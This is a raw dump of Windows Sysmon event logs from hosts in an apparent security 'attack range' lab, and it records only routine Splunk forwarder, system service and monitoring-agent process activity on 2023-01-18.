12:17:30.545{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E35A-63C7-0306-00000000AF02}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000039940Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:30.545{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E35A-63C7-0306-00000000AF02}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000039939Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:30.546{FE4C2B44-E35A-63C7-0306-00000000AF02}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000039938Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:30.467{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDA09F96C6A2E264A5F596EE42259978,SHA256=71688391E5804B657BE055CCEF18E9F7791D44EED40F48662B1AC5F929D71E45,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000015228Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.080{E5A8D418-E359-63C7-E101-00000000B002}3204984C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000039937Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:27.469{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56230-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local445microsoft-ds 354300x800000000000000039936Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:27.469{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56230-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local445microsoft-ds 10341000x800000000000000015260Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:31.757{E5A8D418-E35B-63C7-E301-00000000B002}34723500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000015259Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:31.632{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3F8E40417782C3F7081988BE5BAFCBA,SHA256=69BC82C48A121D8A8F6C874D0D5F68FD621DE56FB1C5238E34A95CE45E53344B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015258Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:31.572{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E35B-63C7-E301-00000000B002}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015257Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:31.572{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015256Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:31.572{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015255Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:31.572{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015254Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:31.572{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015253Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:31.572{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015252Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:31.572{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015251Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:31.572{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015250Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:31.572{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015249Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:31.572{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015248Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:31.572{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E35B-63C7-E301-00000000B002}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015247Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:31.572{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E35B-63C7-E301-00000000B002}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015246Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:31.573{E5A8D418-E35B-63C7-E301-00000000B002}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000039982Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.881{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039981Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.878{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039980Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.873{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039979Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.872{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039978Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.868{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039977Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.849{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039976Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.844{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039975Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.838{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039974Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.836{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program 